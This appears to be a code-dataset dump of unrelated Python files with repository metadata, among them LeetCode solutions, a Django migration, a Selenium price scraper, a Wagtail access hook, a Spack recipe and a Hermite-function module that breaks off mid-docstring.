""" | 28.603175 | 86 | 0.498335 | '''
File: 110.py
File Created: 2021-01-12 13:48:32 -08:00
Author: Taowyoo (caoyxsh@outlook.com)
Brief: https://leetcode.com/problems/balanced-binary-tree/
-----
Last Modified: 2021-01-12 13:48:41 -08:00
Modified By: Taowyoo (caoyxsh@outlook.com>)
-----
Copyright 2020 - 2021
'''
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
"""Recursive Solution
"""
def isBalanced(self, root):
def check(root):
if root is None:
return 0
left = check(root.left)
if left == -1:
return -1
right = check(root.right)
# if imbalanced return -1
if right == -1 or abs(left - right) > 1:
return -1
return 1 + max(left, right) # return current node height
return check(root) != -1
class Solution(object):
"""Itrative Solution
Args:
object ([type]): [description]
"""
def isBalanced(self, root):
stack, node, last, depths = [], root, None, {}
while stack or node:
if node:
stack.append(node)
node = node.left
else:
node = stack[-1]
if not node.right or last == node.right:
node = stack.pop()
left, right = depths.get(node.left, 0), depths.get(node.right, 0)
if abs(left - right) > 1: return False
depths[node] = 1 + max(left, right)
last = node
node = None
else:
node = node.right
return True | 1,119 | 0 | 52 |
855b5b5f58d42b9a856daaad9651e9f5bff5e131 | 486 | py | Python | examples/Boards/pyboard/Display/ssd1306Demo.py | myhumankit/ESP32_IDE_accessible | 5262a5dd106f3f52a374a6c1ef68ff53d8847001 | [
"MIT"
] | 1 | 2020-07-27T19:32:56.000Z | 2020-07-27T19:32:56.000Z | examples/Boards/pyboard/Display/ssd1306Demo.py | myhumankit/Blind_IDE | 5262a5dd106f3f52a374a6c1ef68ff53d8847001 | [
"MIT"
] | null | null | null | examples/Boards/pyboard/Display/ssd1306Demo.py | myhumankit/Blind_IDE | 5262a5dd106f3f52a374a6c1ef68ff53d8847001 | [
"MIT"
] | null | null | null | #hardware platform: pyboard V1.1
import pyb
import ssd1306
i2c=pyb.I2C(1,pyb.I2C.MASTER,baudrate=100000) #Init i2c
lcd=ssd1306.SSD1306_I2C(128,64,i2c) #create LCD object,Specify width and height
lcd.text("DFRobot",0,0) #set "DFRobot" at (0,0)
lcd.text("chengdu",24,16) #set "chengdu" at (24,16)
lcd.text("123456",64,24) #set "123456" at (64,24)
lcd.show() #display | 44.181818 | 91 | 0.547325 | #hardware platform: pyboard V1.1
import pyb
import ssd1306
i2c=pyb.I2C(1,pyb.I2C.MASTER,baudrate=100000) #Init i2c
lcd=ssd1306.SSD1306_I2C(128,64,i2c) #create LCD object,Specify width and height
lcd.text("DFRobot",0,0) #set "DFRobot" at (0,0)
lcd.text("chengdu",24,16) #set "chengdu" at (24,16)
lcd.text("123456",64,24) #set "123456" at (64,24)
lcd.show() #display | 0 | 0 | 0 |
be1fe1edfef0a5b0c9144e72f09f8b6e5ed105d5 | 35 | py | Python | scripts/portal/back_Ludi.py | pantskun/swordiemen | fc33ffec168e6611587fdc75de8270f6827a4176 | [
"MIT"
] | null | null | null | scripts/portal/back_Ludi.py | pantskun/swordiemen | fc33ffec168e6611587fdc75de8270f6827a4176 | [
"MIT"
] | null | null | null | scripts/portal/back_Ludi.py | pantskun/swordiemen | fc33ffec168e6611587fdc75de8270f6827a4176 | [
"MIT"
] | null | null | null | # 223000000
sm.warp(220000000, 26)
| 11.666667 | 22 | 0.742857 | # 223000000
sm.warp(220000000, 26)
| 0 | 0 | 0 |
20c273b1cbd7836ca08eb5b6aa9404af047b5767 | 816 | py | Python | backend/users/migrations/0003_auto_20210710_2236.py | Swannbm/django3-vue2 | 22bc7cc156e89d40e63f1edd5419547177903ebf | [
"CC0-1.0"
] | null | null | null | backend/users/migrations/0003_auto_20210710_2236.py | Swannbm/django3-vue2 | 22bc7cc156e89d40e63f1edd5419547177903ebf | [
"CC0-1.0"
] | 3 | 2022-02-10T11:47:58.000Z | 2022-02-23T18:50:24.000Z | backend/users/migrations/0003_auto_20210710_2236.py | Swannbm/django3-vue2 | 22bc7cc156e89d40e63f1edd5419547177903ebf | [
"CC0-1.0"
] | null | null | null | # Generated by Django 3.2.5 on 2021-07-10 22:36
from django.db import migrations, models
import django.utils.timezone
| 25.5 | 67 | 0.555147 | # Generated by Django 3.2.5 on 2021-07-10 22:36
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
("users", "0002_auto_20210706_2214"),
]
operations = [
migrations.AddField(
model_name="user",
name="creation_date",
field=models.DateTimeField(
auto_now_add=True,
default=django.utils.timezone.now,
verbose_name="creation date",
),
preserve_default=False,
),
migrations.AddField(
model_name="user",
name="email_checked",
field=models.DateTimeField(
blank=True, null=True, verbose_name="email checked"
),
),
]
| 0 | 673 | 23 |
0ed74bd87270d561a4ec564b6ffdc46f62221f3f | 2,155 | py | Python | cu_parser.py | clownkill/CU_bot | 08a42afa7110fc15df35838e1dcaab032b230631 | [
"MIT"
] | null | null | null | cu_parser.py | clownkill/CU_bot | 08a42afa7110fc15df35838e1dcaab032b230631 | [
"MIT"
] | null | null | null | cu_parser.py | clownkill/CU_bot | 08a42afa7110fc15df35838e1dcaab032b230631 | [
"MIT"
] | null | null | null | from selenium.webdriver import Chrome
from selenium.webdriver import ChromeOptions
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.common.by import By
from webdriver_manager.chrome import ChromeDriverManager
if __name__ == '__main__':
main()
| 34.758065 | 137 | 0.722042 | from selenium.webdriver import Chrome
from selenium.webdriver import ChromeOptions
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.common.by import By
from webdriver_manager.chrome import ChromeDriverManager
def get_card_links(driver, end_page):
card_links = []
for page in range(1, end_page+1):
url = f'https://www.computeruniverse.net/en/c/hardware-components/pci-express-graphics-cards?page={page}'
driver.get(url)
g_cards = driver.find_element(
by=By.CLASS_NAME, value='c-pl__main--rows'
).find_elements(by=By.CLASS_NAME, value='c-productItem')
# card_links = [card.find_element(by=By.CLASS_NAME, value='c-productItem__head__name').get_attribute('href') for card in g_cards]
for g_card in g_cards:
card_links.append(g_card.find_element(by=By.CLASS_NAME, value='c-productItem__head__name').get_attribute('href'))
return card_links
def get_end_page(driver):
url = 'https://www.computeruniverse.net/en/c/hardware-components/pci-express-graphics-cards'
driver.get(url)
paginations = driver.find_elements(by=By.CLASS_NAME, value='Pagination__naviButton__inner')
for a_elem in paginations[::-1]:
if a_elem.text.isnumeric():
return int(a_elem.text)
def parse_card_page(driver, url):
driver.get(url)
price_div = driver.find_element(by=By.CLASS_NAME, value='price-box')
price = price_div.find_elements(by=By.TAG_NAME, value='span').text
print(price_div)
def main():
options = ChromeOptions()
options.add_experimental_option("excludeSwitches", ["enable-automation"])
options.add_experimental_option('useAutomationExtension', False)
options.add_argument("--disable-blink-features=AutomationControlled")
driver = Chrome(service=Service(ChromeDriverManager().install()), options=options)
# end_page = get_end_page(driver)
# card_links = get_card_links(driver, end_page)
# for card in card_links:
# print(card)
url = 'https://www.computeruniverse.net/en/p/90836256'
parse_card_page(driver, url)
if __name__ == '__main__':
main()
| 1,781 | 0 | 92 |
4d2ece47a2b1be41bd4a7f580594280353211d45 | 2,403 | py | Python | to-send-a-fax/to_send_a_fax_test.py | simonbates/collected | fd4cbaaf75ca25688983f39d51a02b42a86b3e5a | [
"MIT"
] | 1 | 2019-11-11T12:54:54.000Z | 2019-11-11T12:54:54.000Z | to-send-a-fax/to_send_a_fax_test.py | simonbates/collected | fd4cbaaf75ca25688983f39d51a02b42a86b3e5a | [
"MIT"
] | null | null | null | to-send-a-fax/to_send_a_fax_test.py | simonbates/collected | fd4cbaaf75ca25688983f39d51a02b42a86b3e5a | [
"MIT"
] | null | null | null | from to_send_a_fax import E, f
import unittest
if __name__ == '__main__':
unittest.main()
| 36.969231 | 72 | 0.55181 | from to_send_a_fax import E, f
import unittest
class ToSendAFaxTest(unittest.TestCase):
def test_E(self):
self.assertEqual(4, E(0)) # zero
self.assertEqual(3, E(1)) # one
self.assertEqual(3, E(2)) # two
self.assertEqual(5, E(3)) # three
self.assertEqual(4, E(4)) # four
self.assertEqual(4, E(5)) # five
self.assertEqual(3, E(6)) # six
self.assertEqual(5, E(7)) # seven
self.assertEqual(5, E(8)) # eight
self.assertEqual(4, E(9)) # nine
self.assertEqual(3, E(10)) # ten
self.assertEqual(6, E(11)) # eleven
self.assertEqual(6, E(12)) # twelve
self.assertEqual(8, E(13)) # thirteen
self.assertEqual(8, E(14)) # fourteen
self.assertEqual(7, E(15)) # fifteen
self.assertEqual(7, E(16)) # sixteen
self.assertEqual(9, E(17)) # seventeen
self.assertEqual(8, E(18)) # eighteen
self.assertEqual(8, E(19)) # nineteen
self.assertEqual(6, E(20)) # twenty
self.assertEqual(9, E(21)) # twentyone
self.assertEqual(6, E(30)) # thirty
self.assertEqual(5, E(40)) # forty
self.assertEqual(5, E(50)) # fifty
self.assertEqual(5, E(60)) # sixty
self.assertEqual(7, E(70)) # seventy
self.assertEqual(6, E(80)) # eighty
self.assertEqual(6, E(90)) # ninety
self.assertEqual(10, E(99)) # ninetynine
self.assertEqual(10, E(100)) # one hundred
self.assertEqual(13, E(101)) # one hundred one
self.assertEqual(21, E(123)) # one hundred twenty three
self.assertEqual(21, E(999)) # nine hundred ninety nine
# one hundred twenty three thousand four hundred fifty six
self.assertEqual(48, E(123456))
# nine hundred ninety nine thousand nine hundred ninety nine
self.assertEqual(50, E(999999))
# minus one hundred twenty three thousand four hundred fifty six
self.assertEqual(53, E(-123456))
def test_f(self):
# f(x) = 3[E(x)]^3-x
# f(0) = 3[E(0)]^3
# = 3[4]^3
# = 192
self.assertEqual(192, f(0))
# f(-123) = 3[E(-123)]^3 + 123
# = 3[26]^3 + 123
# = 52851
self.assertEqual(52851, f(-123))
if __name__ == '__main__':
unittest.main()
| 2,213 | 19 | 76 |
0b08850de7be3cabf3317ff12b029901307cb804 | 1,135 | py | Python | responses_parser/response_utils.py | ScriptHound/vk_schema_codegen | 174563adcf2d33f31820addf1f2e4193e40cc03f | [
"MIT"
] | 9 | 2021-01-24T19:25:45.000Z | 2021-05-27T16:51:11.000Z | responses_parser/response_utils.py | ScriptHound/vk_schema_codegen | 174563adcf2d33f31820addf1f2e4193e40cc03f | [
"MIT"
] | 1 | 2021-03-14T14:37:10.000Z | 2021-03-14T14:37:10.000Z | responses_parser/response_utils.py | ScriptHound/vk_schema_codegen | 174563adcf2d33f31820addf1f2e4193e40cc03f | [
"MIT"
] | 1 | 2021-02-08T14:06:29.000Z | 2021-02-08T14:06:29.000Z | import json
from utils.os_utils import create_python_files, create_results_dir
from utils.strings_util import snake_case_to_camel_case
| 34.393939 | 76 | 0.729515 | import json
from utils.os_utils import create_python_files, create_results_dir
from utils.strings_util import snake_case_to_camel_case
def get_responses_titles(json_schema) -> list:
return [title for title in json_schema["definitions"].keys()]
def split_responses_names(json_titles: list) -> list:
filenames = {title.split("_")[0] for title in json_titles}
return list(filenames)
def generate_response_dir(schema_path: str, destination_path: str) -> None:
create_results_dir(destination_path)
with open(schema_path, "r") as schema:
json_dict = json.load(schema)
titles = get_responses_titles(json_dict)
filenames = split_responses_names(titles)
create_python_files(destination_path, filenames)
return filenames, json_dict
def put_responses_by_filename(definitions: dict, categorized: dict) -> dict:
for key, definition in definitions.items():
filebound = key.split("_")[0]
classname = snake_case_to_camel_case("_".join(key.split("_")[1:]))
resp = {classname: definition}
categorized[filebound].update(resp)
return categorized
| 903 | 0 | 92 |
67065dc0824fb854b2b7a7e019e82ceb63c779c4 | 2,404 | py | Python | wagtail/wagtailcore/wagtail_hooks.py | chrxr/wagtail | 9038da9fcd69f0b39121cc54a72f4a6ae6beb06a | [
"BSD-3-Clause"
] | 1 | 2016-12-28T11:51:15.000Z | 2016-12-28T11:51:15.000Z | wagtail/wagtailcore/wagtail_hooks.py | chrxr/wagtail | 9038da9fcd69f0b39121cc54a72f4a6ae6beb06a | [
"BSD-3-Clause"
] | null | null | null | wagtail/wagtailcore/wagtail_hooks.py | chrxr/wagtail | 9038da9fcd69f0b39121cc54a72f4a6ae6beb06a | [
"BSD-3-Clause"
] | null | null | null | from __future__ import absolute_import, unicode_literals
from django.conf import settings
from django.contrib.auth.views import redirect_to_login
from django.core.urlresolvers import reverse
from wagtail.utils.compat import user_is_authenticated
from wagtail.wagtailcore import hooks
from wagtail.wagtailcore.models import PageViewRestriction
@hooks.register('before_serve_page')
def check_view_restrictions(page, request, serve_args, serve_kwargs):
"""
Check whether there are any view restrictions on this page which are
not fulfilled by the given request object. If there are, return an
HttpResponse that will notify the user of that restriction (and possibly
include a password / login form that will allow them to proceed). If
there are no such restrictions, return None
"""
restrictions = page.get_view_restrictions()
if restrictions:
passed_restrictions = request.session.get('passed_page_view_restrictions', [])
for restriction in restrictions:
if restriction.restriction_type == PageViewRestriction.PASSWORD:
if restriction.id not in passed_restrictions:
from wagtail.wagtailcore.forms import PasswordPageViewRestrictionForm
form = PasswordPageViewRestrictionForm(instance=restriction,
initial={'return_url': request.get_full_path()})
action_url = reverse('wagtailcore_authenticate_with_password', args=[restriction.id, page.id])
return page.serve_password_required_response(request, form, action_url)
elif restriction.restriction_type == PageViewRestriction.LOGIN:
if not user_is_authenticated(request.user):
return require_wagtail_login(next=request.get_full_path())
elif restriction.restriction_type == PageViewRestriction.GROUPS:
if not request.user.is_superuser:
current_user_groups = request.user.groups.all()
if not any(group in current_user_groups for group in restriction.groups.all()):
return require_wagtail_login(next=request.get_full_path())
| 51.148936 | 114 | 0.709235 | from __future__ import absolute_import, unicode_literals
from django.conf import settings
from django.contrib.auth.views import redirect_to_login
from django.core.urlresolvers import reverse
from wagtail.utils.compat import user_is_authenticated
from wagtail.wagtailcore import hooks
from wagtail.wagtailcore.models import PageViewRestriction
def require_wagtail_login(next):
login_url = getattr(settings, 'WAGTAIL_FRONTEND_LOGIN_URL', reverse('wagtailcore_login'))
return redirect_to_login(next, login_url)
@hooks.register('before_serve_page')
def check_view_restrictions(page, request, serve_args, serve_kwargs):
"""
Check whether there are any view restrictions on this page which are
not fulfilled by the given request object. If there are, return an
HttpResponse that will notify the user of that restriction (and possibly
include a password / login form that will allow them to proceed). If
there are no such restrictions, return None
"""
restrictions = page.get_view_restrictions()
if restrictions:
passed_restrictions = request.session.get('passed_page_view_restrictions', [])
for restriction in restrictions:
if restriction.restriction_type == PageViewRestriction.PASSWORD:
if restriction.id not in passed_restrictions:
from wagtail.wagtailcore.forms import PasswordPageViewRestrictionForm
form = PasswordPageViewRestrictionForm(instance=restriction,
initial={'return_url': request.get_full_path()})
action_url = reverse('wagtailcore_authenticate_with_password', args=[restriction.id, page.id])
return page.serve_password_required_response(request, form, action_url)
elif restriction.restriction_type == PageViewRestriction.LOGIN:
if not user_is_authenticated(request.user):
return require_wagtail_login(next=request.get_full_path())
elif restriction.restriction_type == PageViewRestriction.GROUPS:
if not request.user.is_superuser:
current_user_groups = request.user.groups.all()
if not any(group in current_user_groups for group in restriction.groups.all()):
return require_wagtail_login(next=request.get_full_path())
| 151 | 0 | 23 |
ed6e516c8aaad603f5a38fb41ff6e59415eebdc7 | 2,013 | py | Python | var/spack/repos/builtin/packages/vecgeom/package.py | xiki-tempula/spack | 9d66c05e93ab8a933fc59915040c0e0c86a4aac4 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | null | null | null | var/spack/repos/builtin/packages/vecgeom/package.py | xiki-tempula/spack | 9d66c05e93ab8a933fc59915040c0e0c86a4aac4 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 1 | 2018-07-06T19:11:46.000Z | 2018-07-06T19:12:28.000Z | var/spack/repos/builtin/packages/vecgeom/package.py | xiki-tempula/spack | 9d66c05e93ab8a933fc59915040c0e0c86a4aac4 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 1 | 2020-03-06T11:04:37.000Z | 2020-03-06T11:04:37.000Z | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
import platform
class Vecgeom(CMakePackage):
"""The vectorized geometry library for particle-detector simulation
(toolkits)."""
homepage = "https://gitlab.cern.ch/VecGeom/VecGeom"
url = "https://gitlab.cern.ch/api/v4/projects/VecGeom%2FVecGeom/repository/archive.tar.gz?sha=v0.3.rc"
version('01.01.03', git='https://gitlab.cern.ch/VecGeom/VecGeom.git', tag='v01.01.03', preferred=True)
version('01.00.00', git='https://gitlab.cern.ch/VecGeom/VecGeom.git', tag='v01.00.00')
version('00.05.00', git='https://gitlab.cern.ch/VecGeom/VecGeom.git', tag='v00.05.00')
version('0.3.rc', sha256='a87a9ea4ab126b59ff9c79182bc0911ead3d76dd197194742e2a35ccd341299d')
variant('cxxstd',
default='17',
values=('11', '14', '17'),
multi=False,
description='Use the specified C++ standard when building.')
variant('vector',
default='native',
values=('sse3', 'sse4.2', 'native'),
multi=False,
description='Specify the instruction set for vectorization.')
depends_on('cmake@3.5:', type='build')
| 37.277778 | 106 | 0.610035 | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
import platform
class Vecgeom(CMakePackage):
"""The vectorized geometry library for particle-detector simulation
(toolkits)."""
homepage = "https://gitlab.cern.ch/VecGeom/VecGeom"
url = "https://gitlab.cern.ch/api/v4/projects/VecGeom%2FVecGeom/repository/archive.tar.gz?sha=v0.3.rc"
version('01.01.03', git='https://gitlab.cern.ch/VecGeom/VecGeom.git', tag='v01.01.03', preferred=True)
version('01.00.00', git='https://gitlab.cern.ch/VecGeom/VecGeom.git', tag='v01.00.00')
version('00.05.00', git='https://gitlab.cern.ch/VecGeom/VecGeom.git', tag='v00.05.00')
version('0.3.rc', sha256='a87a9ea4ab126b59ff9c79182bc0911ead3d76dd197194742e2a35ccd341299d')
variant('cxxstd',
default='17',
values=('11', '14', '17'),
multi=False,
description='Use the specified C++ standard when building.')
variant('vector',
default='native',
values=('sse3', 'sse4.2', 'native'),
multi=False,
description='Specify the instruction set for vectorization.')
depends_on('cmake@3.5:', type='build')
def cmake_args(self):
options = [
'-DBACKEND=Scalar',
'-DGEANT4=OFF',
'-DUSOLIDS=ON',
'-DUSOLIDS_VECGEOM=ON',
'-DROOT=OFF',
'-DNO_SPECIALIZATION=ON',
'-DCMAKE_VERBOSE_MAKEFILE=TRUE']
options.append('-DCMAKE_CXX_STANDARD={0}'.
format(self.spec.variants['cxxstd'].value))
arch = platform.machine()
if arch == 'x86_64':
options.append('-DVECGEOM_VECTOR={0}'.
format(self.spec.variants['vector'].value))
else:
options.append('-DVECGEOM_VECTOR=' + arch)
return options
| 648 | 0 | 27 |
e54bcc9091ea82eec692dff25ba500ba8747bb73 | 1,075 | py | Python | fileprocessing.py | lsauthie/nlp | 8d562443ffea056a66db6ec87823d9198255884d | [
"MIT"
] | null | null | null | fileprocessing.py | lsauthie/nlp | 8d562443ffea056a66db6ec87823d9198255884d | [
"MIT"
] | null | null | null | fileprocessing.py | lsauthie/nlp | 8d562443ffea056a66db6ec87823d9198255884d | [
"MIT"
] | null | null | null | # This module is in charge of managing files
import csv
import json
from pathlib import Path
import os
home = Path(__file__).parents[0]
#write configuration information
| 22.395833 | 81 | 0.611163 | # This module is in charge of managing files
import csv
import json
from pathlib import Path
import os
home = Path(__file__).parents[0]
def read_csv(filename):
list_file = []
with open(home / filename, 'r', encoding="utf-8-sig") as f:
reader = csv.reader(f, delimiter=';')
list_file = list(reader)
return list_file
def write_csv(filename, list_file):
while True:
try:
output = open(home / filename, 'w', newline='', encoding='utf-8-sig')
break
except PermissionError:
input("Please close the file: " + filename + " and click enter!")
output_writer = csv.writer(output, delimiter=';')
for i in list_file:
output_writer.writerow(i)
output.close()
#write configuration information
def read_json():
with open(home / 'config.json') as json_data_file:
data = json.load(json_data_file)
return data
def write_json(data):
with open(home / 'config.json', 'w') as outfile:
json.dump(data, outfile)
| 812 | 0 | 91 |
7ef4aae6f3e4070da2cce418773477b7fab5a70f | 1,647 | py | Python | examples/redirect_print.py | ofek/tqdm | 170bf4a353894f4f42190afac817c833b07077a6 | [
"MIT"
] | 1 | 2017-09-11T17:48:20.000Z | 2017-09-11T17:48:20.000Z | examples/redirect_print.py | ofek/tqdm | 170bf4a353894f4f42190afac817c833b07077a6 | [
"MIT"
] | null | null | null | examples/redirect_print.py | ofek/tqdm | 170bf4a353894f4f42190afac817c833b07077a6 | [
"MIT"
] | null | null | null | """Redirecting writing
If using a library that can print messages to the console, editing the library
by replacing `print()` with `tqdm.write()` may not be desirable.
In that case, redirecting `sys.stdout` to `tqdm.write()` is an option.
To redirect `sys.stdout`, create a file-like class that will write
any input string to `tqdm.write()`, and supply the arguments
`file=sys.stdout, dynamic_ncols=True`.
A reusable canonical example is given below:
"""
from __future__ import print_function
from time import sleep
import contextlib
import sys
from tqdm import tqdm
class DummyTqdmFile(object):
"""Dummy file-like that will write to tqdm"""
file = None
@contextlib.contextmanager
# Redirect stdout to tqdm.write() (don't forget the `as save_stdout`)
with stdout_redirect_to_tqdm() as save_stdout:
# tqdm call need to specify sys.stdout, not sys.stderr (default)
# and dynamic_ncols=True to autodetect console width
for _ in tqdm(range(3), file=save_stdout, dynamic_ncols=True):
blabla()
sleep(.5)
# After the `with`, printing is restored
print('Done!')
| 27 | 78 | 0.692168 | """Redirecting writing
If using a library that can print messages to the console, editing the library
by replacing `print()` with `tqdm.write()` may not be desirable.
In that case, redirecting `sys.stdout` to `tqdm.write()` is an option.
To redirect `sys.stdout`, create a file-like class that will write
any input string to `tqdm.write()`, and supply the arguments
`file=sys.stdout, dynamic_ncols=True`.
A reusable canonical example is given below:
"""
from __future__ import print_function
from time import sleep
import contextlib
import sys
from tqdm import tqdm
class DummyTqdmFile(object):
"""Dummy file-like that will write to tqdm"""
file = None
def __init__(self, file):
self.file = file
def write(self, x):
# Avoid print() second call (useless \n)
if len(x.rstrip()) > 0:
tqdm.write(x, file=self.file)
@contextlib.contextmanager
def stdout_redirect_to_tqdm():
save_stdout = sys.stdout
try:
sys.stdout = DummyTqdmFile(sys.stdout)
yield save_stdout
# Relay exceptions
except Exception as exc:
raise exc
# Always restore sys.stdout if necessary
finally:
sys.stdout = save_stdout
def blabla():
print("Foo blabla")
# Redirect stdout to tqdm.write() (don't forget the `as save_stdout`)
with stdout_redirect_to_tqdm() as save_stdout:
# tqdm call need to specify sys.stdout, not sys.stderr (default)
# and dynamic_ncols=True to autodetect console width
for _ in tqdm(range(3), file=save_stdout, dynamic_ncols=True):
blabla()
sleep(.5)
# After the `with`, printing is restored
print('Done!')
| 447 | 0 | 99 |
5ca73c1342032c6607c82fdb86402a0ba3c46925 | 54 | py | Python | WinPlaceShowAPI/jsonapi/predictions.py | jojordan3/winplaceshow-api | eaa8383935339e4b3abb8167d6005290a731f426 | [
"MIT"
] | null | null | null | WinPlaceShowAPI/jsonapi/predictions.py | jojordan3/winplaceshow-api | eaa8383935339e4b3abb8167d6005290a731f426 | [
"MIT"
] | 6 | 2020-02-12T00:08:59.000Z | 2021-06-10T17:58:35.000Z | WinPlaceShowAPI/jsonapi/predictions.py | jojordan3/winplaceshow-api | eaa8383935339e4b3abb8167d6005290a731f426 | [
"MIT"
] | null | null | null | """Here is a thing""" | 13.5 | 22 | 0.62963 | """Here is a thing"""
class RacePredictor():
pass | 0 | 10 | 23 |
1133ddefe5c708be325c6b1aaa0cb80a18cf1bd3 | 5,120 | py | Python | hermite_functions/hermite_functions.py | Rob217/Hermite-functions | f6fc5f8115055619f2b8ec1051eca6c4621569a4 | [
"MIT"
] | 1 | 2020-09-14T20:00:52.000Z | 2020-09-14T20:00:52.000Z | hermite_functions/hermite_functions.py | Rob217/Hermite-functions | f6fc5f8115055619f2b8ec1051eca6c4621569a4 | [
"MIT"
] | 8 | 2020-08-24T10:02:24.000Z | 2020-09-14T19:36:26.000Z | hermite_functions/hermite_functions.py | Rob217/Hermite-functions | f6fc5f8115055619f2b8ec1051eca6c4621569a4 | [
"MIT"
] | null | null | null | import numpy as np
from scipy.special import eval_hermite, factorial
def hermite_functions(n, x, all_n=True, move_axes=(), method="recursive"):
"""
Calculate the Hermite functions up to the nth order at position x, psi_n(x).
For details see:
https://en.wikipedia.org/wiki/Hermite_polynomials#Hermite_functions
If all_n == True, then return all Hermite functions up to n
If all_n == False, only return nth Hermite function
If using recursive method, then the latter is more memory efficient as it
only stores psi_n, psi_{n-1}, and psi_{n-2}
The 'move_axes' option causes the output dimensions to be swapped around
using np.moveaxis.
Uses one of three possible calculation methods:
'recursive' - Uses recursive method. Most efficient for n > 5.
'direct' - Calculates directly using Hermite polynomials.
Inefficient due to factorial and Hermite polynomial,
although useful for comparison when testing
'analytic' - Uses analytic expressions (only for n <= 5)
Recursion relation:
psi_n(x) = sqrt(2/n) * x * psi_{n-1}(x) - sqrt((n-1)/n) * psi_{n-2}(x)
Examples:
>>> x = np.mgrid[-2:3, 0:4]
>>> x.shape
(2, 5, 4)
>>> n = 5
>>> psi = hermite_functions(n, x, all_n=False)
>>> psi.shape
(2, 5, 4)
>>> psi = hermite_functions(n, x, all_n=True)
>>> psi.shape
(6, 2, 5, 4)
>>> reshape = ([0, 1, 2, 3], [1, 3, 2, 0])
>>> psi = hermite_functions(n, x, all_n=True, move_axes=reshape)
>>> psi.shape
(4, 6, 5, 2)
"""
if method not in ["recursive", "analytic", "direct"]:
raise ValueError("Method not recognized.")
if not (issubclass(type(n), int) or issubclass(type(n), np.integer)):
raise TypeError("n must be an integer.")
if n < 0:
raise ValueError("n must be non-negative.")
if method == "analytic" and (n > 5):
raise ValueError("n must not be greater than 5 for analytic calculation.")
if all_n:
psi_n = _Hermite_all_n(n, x, method)
else:
psi_n = _Hermite_single_n(n, x, method)
if move_axes:
psi_n = np.moveaxis(psi_n, move_axes[0], move_axes[1])
return psi_n
def _Hermite_single_n(n, x, method):
"""
Calculates psi_n(x) for a single value of n.
"""
if method == "analytic":
return _H_analytic(n, x)
if method == "direct":
return _H_direct(n, x)
psi_m_minus_2 = _H_analytic(0, x)
if n == 0:
return psi_m_minus_2
psi_m_minus_1 = _H_analytic(1, x)
if n == 1:
return psi_m_minus_1
for m in range(2, n + 1):
psi_m = _H_recursive(m, x, psi_m_minus_2, psi_m_minus_1)
psi_m_minus_2 = psi_m_minus_1
psi_m_minus_1 = psi_m
return psi_m
def _Hermite_all_n(n, x, method):
"""
Calcualtes psi_m(x) for all 0 <= m <= n.
"""
try:
psi_n = np.zeros((n + 1,) + x.shape)
except AttributeError: # x does not have property 'shape'
psi_n = np.zeros((n + 1, 1))
if method == "analytic":
for m in range(n + 1):
psi_n[m, :] = _H_analytic(m, x)
return psi_n
if method == "direct":
for m in range(n + 1):
psi_n[m, :] = _H_direct(m, x)
return psi_n
psi_n[0, :] = _H_analytic(0, x)
if n == 0:
return psi_n
psi_n[1, :] = _H_analytic(1, x)
if n == 1:
return psi_n
for m in range(2, n + 1):
psi_n[m, :] = _H_recursive(m, x, psi_n[m - 2, :], psi_n[m - 1, :])
return psi_n
def _H_recursive(m, x, psi_m_minus_2, psi_m_minus_1):
"""
Calculate psi_m(x) using recursion relation.
"""
return np.sqrt(2 / m) * x * psi_m_minus_1 - np.sqrt((m - 1) / m) * psi_m_minus_2
def _H_analytic(n, x):
"""
Analytic expressions for psi_n(x) for 0 <= n <= 5.
"""
if n == 0:
return np.pi ** (-1 / 4) * np.exp(-(x ** 2) / 2)
if n == 1:
return np.sqrt(2) * np.pi ** (-1 / 4) * x * np.exp(-(x ** 2) / 2)
if n == 2:
return (
(np.sqrt(2) * np.pi ** (1 / 4)) ** (-1)
* (2 * x ** 2 - 1)
* np.exp(-(x ** 2) / 2)
)
if n == 3:
return (
(np.sqrt(3) * np.pi ** (1 / 4)) ** (-1)
* (2 * x ** 3 - 3 * x)
* np.exp(-(x ** 2) / 2)
)
if n == 4:
return (
(2 * np.sqrt(6) * np.pi ** (1 / 4)) ** (-1)
* (4 * x ** 4 - 12 * x ** 2 + 3)
* np.exp(-(x ** 2) / 2)
)
if n == 5:
return (
(2 * np.sqrt(15) * np.pi ** (1 / 4)) ** (-1)
* (4 * x ** 5 - 20 * x ** 3 + 15 * x)
* np.exp(-(x ** 2) / 2)
)
raise ValueError("n must be an integer between 0 and 5")
def _H_direct(n, x):
"""
Calculate psi_n(x) using explicit definition.
"""
return (
1
/ np.sqrt(2 ** n * factorial(n))
* np.pi ** (-1 / 4)
* np.exp(-(x ** 2) / 2)
* eval_hermite(n, x)
)
if __name__ == "__main__":
import doctest
doctest.testmod()
| 26.947368 | 84 | 0.525391 | import numpy as np
from scipy.special import eval_hermite, factorial
def hermite_functions(n, x, all_n=True, move_axes=(), method="recursive"):
"""
Calculate the Hermite functions up to the nth order at position x, psi_n(x).
For details see:
https://en.wikipedia.org/wiki/Hermite_polynomials#Hermite_functions
If all_n == True, then return all Hermite functions up to n
If all_n == False, only return nth Hermite function
If using recursive method, then the latter is more memory efficient as it
only stores psi_n, psi_{n-1}, and psi_{n-2}
The 'move_axes' option causes the output dimensions to be swapped around
using np.moveaxis.
Uses one of three possible calculation methods:
'recursive' - Uses recursive method. Most efficient for n > 5.
'direct' - Calculates directly using Hermite polynomials.
Inefficient due to factorial and Hermite polynomial,
although useful for comparison when testing
'analytic' - Uses analytic expressions (only for n <= 5)
Recursion relation:
psi_n(x) = sqrt(2/n) * x * psi_{n-1}(x) - sqrt((n-1)/n) * psi_{n-2}(x)
Examples:
>>> x = np.mgrid[-2:3, 0:4]
>>> x.shape
(2, 5, 4)
>>> n = 5
>>> psi = hermite_functions(n, x, all_n=False)
>>> psi.shape
(2, 5, 4)
>>> psi = hermite_functions(n, x, all_n=True)
>>> psi.shape
